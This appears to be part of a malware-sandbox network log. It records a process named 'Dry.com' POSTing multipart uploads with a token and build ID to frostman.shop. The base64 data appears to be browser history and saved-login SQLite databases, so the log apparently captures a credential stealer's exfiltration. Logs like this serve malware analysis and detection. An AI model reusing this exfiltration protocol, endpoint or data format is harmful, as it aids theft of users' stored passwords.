                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                          Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          26192.168.2.550073116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----M7YMOHLXBIEUAIMOP89R
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 68733
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------M7YMOHLXBIEUAIMOP89RContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------M7YMOHLXBIEUAIMOP89RContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------M7YMOHLXBIEUAIMOP89RCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:29 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                          Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          27192.168.2.550081116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----QIEKNOZMOZU37QQQIWL6
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 262605
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 49 45 4b 4e 4f 5a 4d 4f 5a 55 33 37 51 51 51 49 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 51 49 45 4b 4e 4f 5a 4d 4f 5a 55 33 37 51 51 51 49 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 51 49 45 4b 4e 4f 5a 4d 4f 5a 55 33 37 51 51 51 49 57 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------QIEKNOZMOZU37QQQIWL6Content-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------QIEKNOZMOZU37QQQIWL6Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------QIEKNOZMOZU37QQQIWL6Cont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
